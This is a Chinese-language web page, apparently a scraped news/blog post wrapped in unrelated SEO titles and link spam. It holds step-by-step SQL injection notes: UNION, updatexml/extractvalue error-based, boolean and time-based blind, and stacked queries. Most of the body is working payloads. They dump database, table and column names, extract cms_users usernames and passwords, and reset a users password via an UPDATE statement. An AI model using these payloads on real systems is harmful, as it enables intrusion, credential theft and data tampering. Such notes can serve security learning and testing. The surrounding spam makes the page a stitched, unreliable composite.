当前位置: 首页 > news >正文

网站全面推广方案网站建设费如何记账

news 2025/12/19 10:17:56
网站全面推广方案,网站建设费如何记账,阿里云虚拟主机怎么建立网站,soul是哪家公司开发的目的 通过sqk注入获取数据内容 掌握sql注入基本手法 我们这里使用 1.联合注入 就是利用union select 语句 两条语句 同时执行 实现跨库跨表查询 条件 两条select语句查询结果具有相同列数 对应列数数据类型相同 简单的步骤 1.目标分析 #xff1f;id…目的  通过sqk注入获取数据内容  掌握sql注入基本手法  我们这里使用 1.联合注入   就是利用union select  语句   两条语句 同时执行 实现跨库跨表查询  条件  两条select语句查询结果具有相同列数  对应列数数据类型相同  简单的步骤  1.目标分析   id32 id33     这一步看看有没有页面变化   其实就是mysql数据库执行  如果有 第一步   查看列数    id32 order  by   1  一致改变数字   直到页面一篇空白  没有内容       判断出来一共有多少列      如果到20就显示空白  那末20-1 就是19 是他的极限   第二步 判断回显位置 把第一条select查询语句变成假的    因为只要前端报错   后面的语句才会执行  id-32假的 union select  1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 id32 and 12 这个也是假 这一步会把 回显的位置爆破出来  第三步  数据库敏感信息 也可以  id-33 ?id32 and 12 union select 1,2,3,4,5,6,7,8,9,10,database(),12,13,14,15   在回显位置查看数据库名字 ?id32 and 12 union select 1,2,3,4,5,6,7,8,9,10,version(),12,13,14,15  查看版本  ?id32 and 12 union select 1,2,3,4,5,6,7,8,9,10,datadir,12,13,14,15  查看数据库系统变量  ?id32 and 12只为假 union select 1,2,3,4,5,6,7,8,9,10,current_user(),12,13,14,15 1 2 3 4  函数返回的是当前会话中的用户身份信息 获取管理员和密码  必须报错前面的值 information_schema.tables  自带数据库 库名字  表名字  列名字 数据库名字     ?id-33 UNION SELECT 1,2,database(),4,5,6,7,8,9,10,11,12,13,14,15 表名字 1.查看数据库所有的表     group by    ?id-33 UNION SELECT 1,2,count(*)统计,4,5,6,7,8,9,10,11,12,13,14,15 from information_schema.tablesmysql的自带数据库 where table_schemadatabase()条件是现在的数据库   这句话的意思    2.查看表的名字   16进制  bp可以解码  ?id-33 UNION SELECT 1,2,hex(table_name),4,5,6,7,8,9,10,11,12,13,14,15 from information_schema.tables where  table_schemadatabase() limit 0,1   16进制查看0列1行 ?id-33 UNION SELECT 1,2,hex(table_name),4,5,6,7,8,9,10,11,12,13,14,15 from information_schema.tables where table_schemadatabase() limit 1,1   查看1行1列  2.查出所有的表的 它将从当前数据库中的所有表中获取信息 ?id-33 UNION SELECT 1,2,hex(group_concat(table_name))分组查询,4,5,6,7,8,9,10,11,12,13,14,15 from information_schema.tables where table_schemadatabase()  记住一定要解码  负责就是16进制   bp或者网站  3.查看列数  ?id-33 UNION SELECT 1,2,hex(group_concat(column_name))合并列名,4,5,6,7,8,9,10,11,12,13,14,15 from information_schema.columns where table_schemadatabase() and table_namecms_users’ 查看列数 在这个表里  在这个数据库             4.查看账户和密码  id-33 UNION SELECT 1,2,hex(concat(username,0x3a,password)),4,5,6,7,8,9,10,11,12,13,14,15 from cms_users   查看表里的账户和密码  一定要解密      报错注入  在注入点判断过程中  发现sql注入的报错语句   显示到页面  在错误信息里执行sql语句  案例    id33‘    数据库报错    id33’‘  数据库   直接使用  第一种方法   group by   查看数据库   页面并且报错  报错页面  前提  id33’闭合字段 爆数据库的错  并且回显到页面  第一中 updatexml   mysql数据库   爆数据库名and(select updatexml(1,concat(0x7e,(select database())),0x7e)) 爆表名and(select updatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schemadatabase())),0x7e)) 爆列名and(select updatexml(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_nameTABLE_NAME)),0x7e)) 爆数据and(select updatexml(1,concat(0x7e,(select group_concat(COLUMN_NAME)from TABLE_NAME)),0x7e)) 第二种  extractvalue  查数据库名idand(select extractvalue(1,concat(0x7e,(select database())))) 爆表名idand(select extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schemadatabase())))) 爆字段名idand(select extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_nameTABLE_NAME)))) 爆数据idand(select extractvalue(1,concat(0x7e,(select group_concat(COIUMN_NAME) from TABLE_NAME)))) 三.布尔盲注  没有回显    直接猜    效率极低   1. id2闭合 and database()xxx --   猜数据库名字    页面正常  2.?id2 and length(database())8 --   猜长度   页面正常  3.猜数据库的字目  ascill值  id2 and ascii(substr(database(),1,1))115 --    第一个数字  and ascii(substr(database(),2,1))101 --     第二个数字  四.延时注入   实验sleep的延时性  以时间线做判断条件  ?id2 and if(length(database())1,sleep(5),1) --   看看页面延时  如果数据库名字大于1睡5s ?id2 and if(substr(database(),3,1)c,sleep(5),1) --  如果是第三个列的第一个字符  是不是为c  五.堆叠查询 多条语句执行     真实场景极少  堆叠注入和union的区别在于union后只能跟select而堆叠后面可以使用insertupdate createdelete等常规数据库语句 id2;update users set password123456--
http://www.w-s-a.com/news/897998/

相关文章:

  • 网站开发是指wordpress系统在线升级
  • 网站建设运营的灵魂是什么意思页面跳转中
  • 家政服务网站源码重庆建网站企业有哪些
  • 怎样分析一个网站做的好坏重庆长寿网站设计公司哪家专业
  • 百度助手app下载苏州seo关键词优化排名
  • 17网站一起做 佛山诸城网站建设多少钱
  • 郑州网站建设培训学校泉州做网站设计公司
  • 西峡做网站深圳建筑工务署官网
  • 单县网站惠州seo计费
  • 万网网站建设 优帮云怎样用记事本做网站
  • 注册域名后网站建设百度指数的功能
  • 怎么做伪静态网站山西网站建设设计
  • 做小型企业网站多少钱衡阳市建设局网站
  • 金华专业网站建设公司网站建设空间和服务器方式
  • 自己做的网站在浏览器上显示不安全吗wordpress revolution slider
  • 西安网站建设推广优化搜索引擎营销
  • 互联网站备案管理工作方案 工信部注册深圳公司需要什么条件
  • 网站网站服务器网站建设 物流
  • 国外开发网站手机网站建设制作
  • 怎么把自己做的网站传网上青岛工程建设监理公司网站
  • 网站301跳转效果商丘网站公司
  • 公司网站建设西安网站的架构与建设
  • 食品科技学校网站模板花溪村镇建设银行网站
  • 图片渐隐 网站头部flash地方志网站建设自查报告
  • 深圳做商城网站视觉品牌网站建设
  • 永康电子商务网站建设弹幕网站怎么做
  • 百川网站企业做网站要注意哪些
  • 球迷类的网站如何做网站建设需要哪些素材
  • 请问有重庆有做网站吗电子政务系统网站建设的基本过程
  • 建设银行管方网站官网最新版cmsv6